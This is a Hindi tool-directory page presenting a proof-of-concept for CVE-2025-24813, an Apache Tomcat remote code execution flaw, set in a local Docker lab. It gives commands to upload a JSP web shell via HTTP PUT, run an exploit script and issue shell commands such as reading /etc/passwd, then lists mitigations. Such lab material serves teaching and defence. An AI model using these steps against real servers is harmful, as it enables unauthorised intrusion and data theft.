Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813 — Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC | Kitploit
उपकरण/GitHubGitHub/shivshantp/cve-2025-24813
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingPayload DevelopmentLabs & Practice
GitHubshivshantp/cve-2025-24813

CVE-2025-24813

Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE शोषण

CVE Exploit-Status Platform Language Dockerized License

यह रिपॉजिटरी CVE-2025-24813 के लिए एक पूर्ण प्रूफ-ऑफ-कॉन्सेप्ट (PoC) रखता है, जो Apache Tomcat में HTTP PUT विधि का उपयोग करके एक दुर्भावनापूर्ण JSP वेब शेल को तैनात करने वाली एक दूरस्थ कोड निष्पादन (RCE) कमजोरी है।

🔥 यह शोषण दर्शाता है कि कैसे एक हमलावर अनुचित रूप से सुरक्षित Tomcat इंस्टेंस में फ़ाइल अपलोड और पेलोड निष्पादन के माध्यम से RCE प्राप्त कर सकता है।


📁 प्रोजेक्ट संरचना

root@kitploit:~
CVE-2025-24813/
├── docker/                         
│   ├── Dockerfile
│   └── web.xml                    
├── exploit/                        
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/                    
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md

🚀 शोषण के चरण

1️⃣ Docker वातावरण सेटअप करें

root@kitploit:~
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat

📸 Tomcat चल रहा है
📸 Docker शुरू हुआ


2️⃣ दुर्भावनापूर्ण JSP शेल अपलोड करें

root@kitploit:~
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp

📸 JSP अपलोड करें


3️⃣ Python शोषण निष्पादित करें

root@kitploit:~
python3 exploit/1_exploit_cve_2025_24813.py

📸 शोषण चलाएं


4️⃣ वेब शेल के साथ इंटरैक्ट करें

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd

📸 whoami
📸 passwd
📸 uname
📸 id
📸 pwd


🧩 विशेषताएँ

  • 🔧 कमजोर Apache Tomcat सर्वर का Docker-आधारित सेटअप
  • 📥 PUT विधि का दुरुपयोग करके JSP वेब शेल अपलोड और ट्रिगर करना
  • 🐍 Python-आधारित PoC स्क्रिप्ट
  • 📸 पूर्ण स्क्रीनशॉट-आधारित वॉकथ्रू
  • 📚 रेड टीम सिमुलेशन और शिक्षा के लिए आदर्श

🛠️ कैसे पैच करें (शमन)

  • 🚫 web.xml या सर्वर कॉन्फ़िगरेशन में PUT/DELETE विधियाँ अक्षम करें
  • ⛓️ सुरक्षा प्रबंधक या कड़े सर्वलेट कंटेनर नियंत्रण का उपयोग करें
  • 🔐 फ़ाइल-स्तरीय अपलोड फ़िल्टर और सत्यापन लागू करें
  • 🧱 अनधिकृत PUT अनुरोधों को ब्लॉक करने के लिए WAF सेट अप करें
  • ✅ Apache Tomcat के सुरक्षित और पैच किए गए संस्करण में अपग्रेड करें

⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। उन सिस्टमों पर अनधिकृत परीक्षण, शोषण या उपयोग जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की अनुमति नहीं है, अवैध और अनैतिक है।


👨‍💻 लेखक

शिवशांत पाटिल
प्रमाणित एथिकल हैकर (CEH v13)
B.Tech कंप्यूटर इंजीनियरिंग स्नातक
🔗 LinkedIn
🔗 GitHub

टूल डाउनलोड करें